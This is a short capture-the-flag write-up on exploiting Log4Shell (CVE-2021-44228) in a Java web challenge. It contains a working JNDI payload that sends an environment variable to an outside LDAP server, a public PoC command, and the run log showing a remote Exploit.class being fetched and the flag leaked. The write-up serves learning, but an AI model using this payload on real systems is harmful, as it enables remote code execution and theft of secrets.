Tags: exploit log4j web env java
Rating:
pom.xml in the java maven project says
```xml
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.14.1</version>
</dependency>
```
That's the vulnerable version of log4j everyone was going crazy about.
There's this poc exploit for log4j https://github.com/kozmer/log4j-shell-poc
I ran it on my vps.
I submitted `${jndi:ldap://123.123.123.123:1389/${env:flag}}` as the text with an image that I corrupted by just typing in random letters in burpsuite in the middle of the image bytes until I got the right kind of error in the java code for it to log that text and execute the jndi ldap request.
The flag was an env variable.
```
~/ctf/log4j/log4j-shell-poc$ python3 poc.py --userip 123.123.123.123 --webport 8005 --lport 9001
[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc
[+] Exploit java class created success
[+] Setting up LDAP server
[+] Send me: ${jndi:ldap://123.123.123.123:1389/a}
[+] Starting Webserver on port 8005 http://0.0.0.0:8005
Listening on 0.0.0.0:1389
Send LDAP reference result for a redirecting to http://123.123.123.123:8005/Exploit.class
68.183.72.188 - - [16/Mar/2024 08:39:30] "GET /Exploit.class HTTP/1.1" 200 -
Send LDAP reference result for 1753c{generate_text_to_get_an_epic_rce} redirecting to http://123.123.123.123:8005/Exploit.class
68.183.72.188 - - [16/Mar/2024 08:40:12] "GET /Exploit.class HTTP/1.1" 200 -
Send LDAP reference result for 1753c{generate_text_to_get_an_epic_rce} redirecting to http://123.123.123.123:8005/Exploit.class
68.183.72.188 - - [16/Mar/2024 08:40:12] "GET /Exploit.class HTTP/1.1" 200 -
```